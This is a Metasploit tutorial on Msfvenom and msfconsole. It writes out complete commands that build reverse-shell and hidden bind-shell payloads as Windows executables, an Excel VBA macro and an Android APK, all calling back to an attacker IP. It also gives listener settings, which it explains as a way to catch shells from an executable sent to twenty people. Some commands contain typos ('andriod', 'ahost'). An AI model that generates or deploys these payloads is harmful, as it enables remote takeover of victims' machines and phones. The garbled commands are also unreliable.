Table of Contents
What Is Msfvenom
Msfvenom is a standalone payload generator. It is a combination of Msfpayload and Msfencode. It is fast and uses a single instance. It also has standardized command line options. You can generate payloads for so many platforms like Cisco, Android, OSX, BSD, Solaris, Firefox, Windows, Unix, Nodejs and much more.
Basically, Msfvenom is used to generate and output all of the various types of shellcode that are available in Metasploit.
Lhost = IP of your Linux OS.
Lport = any port you wish to assign to the listener.
P = Payload I.e. Windows, Android, PHP etc.
F = File extension like windows=exe, android=apk etc.
Basic Commands Of Msfvenom
Here are some basic commands of Msfvenom you can search that commands in your terminal by this command-
Useful Commands For Msfvenom
A bind shell is a kind that opens up a new service on the target machine and requires the attacker to connect to it in order to get a session.
The bind_tcp option is helpful in case we get disconnected from victim machine while it is still running, we can execute the same command and get back the session without any intervention of the victim to run the exploit again.
msfvenom -p windows/meterpreter/bind_tcp -f exe > /home/Desktop/bind.exe
Reverse TCP Payload
A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > / home/Desktop/reverse_tcp.exe
Both the above payloads can be used in case we have relevant ports active on the victim machine, so the question arises what if the victim has blocked all the ports?
Well in such cases we can create payloads as per the ports running on the victim machine such as 443 for HTTPS.
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /home/Desktop/443.exe
Hidden Bind TCP Payload
Let us now explore some other techniques available in Msfvenom Tool and try to exploit the victim machine, this time we will get the shell of the victim machine instead of meterpreter session.
This payload hides in the background silently, while executed and does not reveal its presence if scanned by any port scanner.
msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /home/Desktop/hidden.exe
Let us now create a payload with a VBA script, which we will use to create a macro on Excel to exploit the victim machine.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba
Let us use one of the androids exploit available within the Msfvenom tool and use it to our benefit. It is mainly us for android attack.
msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /home/Desktop/file.apk
The msfconsole is probably the most popular interface to the Metasploit Framework. We can test the file we created. However, before we start testing, we will need to launch the Metasploit multi-handler to accept incoming connections. We will open a separate console and start the application. We run the Metasploit console by typing the “msfconsole” command.
use exploit/multi/handler We specify our hands that will listen to incoming connections.
set PAYLOAD windows/meterpreter/Bind_tcp We arrange our payload, which will establish a bind connection to us.
set LHOST 192.168.126.141 We specify our IP address that will accept incoming connections.
set LPORT 443 We state that we will listen to connections coming to the 443rd port and we will accept these connections.
set ExitOnSession false No matter how many links come, we set this value to false for new connections to arrive. If I need to explain with an example; “Let’s assume that we will send the exe we created to 20 people. Under normal circumstances (ie default)
if we do not change this value, other 19 people will not be able to contact us after the first connection is received. If we
say there is no such problem, we have to make this value false. “
exploit -j -z We switched to Listen mode and determined a jobs for connections. After that, all incoming connections will be covere
Benefits to Using MSFconsole
- It is the only supported way to access most of the features within Metasploit..
- Provides a console-based interface to the framework.
- Contains the most features and is the most stable MSF interface.
- Full readline support, tabbing, and command completion.
- Execution of external commands in Msfconsole is possible.